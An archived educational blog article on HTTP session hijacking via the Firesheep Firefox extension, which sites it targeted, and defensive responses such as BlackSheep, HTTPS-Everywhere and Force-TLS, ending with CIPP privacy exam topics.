Archives

Firesheep & User Privacy

Privacy risks are inherent to browsing and interacting online. The recently developed tool, Firesheep, draws attention to user vulnerabilities in web sessions. This article discusses some threats of HTTP session hijacking, as well as potential methods of reducing such threats.

HTTP Session Hijacking
Typically, users logging into a web site are requested to submit their user name and password. The server then verifies this information with a matching account. Once verified, the server sends back a cookie that is used by the user’s browser for subsequent requests. This initial login process is normally protected through encryption, however, the rest of the HTTP session is usually not protected in the same way.

The practice of HTTP session hijacking, also referred to as “sidejacking,” describes an attack in which hackers obtain user’s cookies, which means they can appear to be acting as a user on the web site. This makes users especially vulnerable on open wireless networks.

Unfortunately, many web sites do not incorporate adequate protection mechanisms for their users. At this time, the only effective prevention is full end-to-end encryption (HTTPS or SSL). This ensures that traffic between the user and destination is kept private.

Point-and-Click Sidejacking
Firesheep is a Firefox extension created by Eric Butler, a freelance Web application developer and released on October 24, 2010. It demonstrates the danger of HTTP session hijacking attacks through from public WiFi spots. It is free and open source for Mac OS X and Windows, with Linux on the way. Firesheep enables users, technical minded or not, to hijack others’ social network connections on Facebook.

Facebook, like many other websites, authenticates users with cookies. If a user logs on through an open, unencrypted WiFi connection, the cookies can be detected. Firesheep relies on wincap to access the authentication information for different user accounts, allowing individuals to sidejack the connection.

A user running Firesheep on any open WiFi network will be notified as soon as anyone on the network visits an insecure web site. Firesheep then allows users to log into that site using the other user’s credentials. There is a wide-ranging scope of what Firesheep considers to be “insecure web sites;” Firesheep is designed to identify cookies from various sites, including:

• Facebook
• Foursquare
• Gowalla
• Amazon.com
• Basecamp
• bit.ly
• Cisco
• CNET
• Dropbox
• Enom
• Evernote
• Flickr
• Github
• Google
• HackerNews
• Harvest
• Windows Live
• NY Times
• Pivotal Tracker
• Slicehost
• tumblr
• Twitter
• WordPress
• Yahoo
• Yelp

For each of the above web sites, it reports the victim’s name, user ID and even their photo, where available. While Firesheep runs on Firefox, it is able to sidejack any user, regardless of their operating system or web browser.

In Response…
Soon after the release of Firesheep, Facebook made its official response to the exposure of its security shortcomings:
“We have been making progress testing SSL access across Facebook and hope to provide it as an option in the coming months. As always, we advise people to use caution when sending or receiving information over unsecured WiFi networks.”

The Federal Trade Commission (FTC) also recommends that users take the necessary precautions when transmitting sensitive personal information over public networks:
“Be careful about the information you access or send from a public wireless network. To be on the safe side, you may want to assume that other people can access any information you see or send over a public wireless network. Unless you can verify that a hot spot has effective security measures in place, it may be best to avoid sending or receiving sensitive information over that network.”

What is BlackSheep?
Created by Julien Sobrier and released on November 8, 2010, BlackSheep was designed to respond to the Firesheep threat. It is a Firefox plug-in that functions as an early warning system when web sessions are at risk of being sidejacked, or already sidejacked by someone running Firesheep. According to Sobrier:
“If you used BlackSheep and were on WiFi, you could see a warning that someone on the same wireless network was using Firesheep. You would know someone is spying on you and trying to sniff your session, so you shouldn’t go to Facebook… It warns you to be careful.”

BlackSheep is actually based on Firesheep source code, reusing the same network listening back-end, the list of targeted web sites and corresponding cookies.

While BlackSheep does not block or disable Firesheep, the actual level of user protection is doubtful. Critics point out that there are many shortcomings in BlackSheep’s detection. They also argue that as Firesheep is capable of detecting and reporting fake cookies as errors, educated Firesheep users would be able to detect a user running BlackSheep.

HTTPS-Everywhere
Some argue that a far better solution to the Firesheep threat may be the HTTPS-Everywhere tool, which is another Firefox extension. This tool is the product of a collaboration between The Tor Project and the Electronic Frontier Foundation. The HTTPS-Everywhere extension encrypts communications with various major websites, including:
• Google Search
• Facebook
• Twitter
• Wikipedia
• GMX
• WordPress
• NY Times
• Paypal
The HTTPS-Everywhere extension addresses the issue of incomplete encryption, in which web sites only encrypt on certain pages, but will default to unencrypted HTTP. The tool rewrites all requests to such sites to HTTPS. However, many web sites display content from third party domains that are often unavailable over HTTPS. The user will be notified of this vulnerability.

Force-TLS
Similar to the HTTPS-Everywhere tool, Force-TLS is a Firefox extension that allows the browser to convert HTTP to HTTPS on indicated sites. Users are able to indicate such sites in their Firefox Add On Preferences menu. This protects users’ log in information and ensures more secure connections to social networking web sites. By avoiding the HTTP protocol, Force-TLS makes user cookies invisible to Firesheep attacks. It requires that web sites make their requests over an SSL-secured channel.

Summary
This article explores the threat of HTML session hijacking, which takes advantage of public WiFi networks to access web cookies, potentially allowing perpetrators to commit identity theft without the user’s knowledge. The recently developed Firefox extension, Firesheep, allows even basic web users to sidejack HTML sessions. This article also looks at some potential solutions and responses to the Firesheep tool, including BlackSheep, HTTPS-Everywhere and Force-TLS. Such tools draw attention to the reality that even with security measures, sending or receiving sensitive information over public wireless networks can put users at risk of privacy attacks.

CIPP Exam Preparation
In preparation for the Certification Foundation (Foundations) exam; and the Certified Information Privacy Professional/Information Technology (CIPP/IT) exam, a privacy professional should be comfortable with topics related to this post, including:
• Online Privacy – Online Identification Mechanisms – Cookies (Foundations; III.B.g.i.)
• Privacy Concerns – Revealing Private Information to Other Users (CIPP/IT; II.A.i.)
• Privacy-Enhancing Technologies – Web Cookies (CIPP/IT; III.B.c.i.)
• Web Security Protocols – TLS, SSL, HTTPS (CIPP/IT: III.B.c.iv.)

Share

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>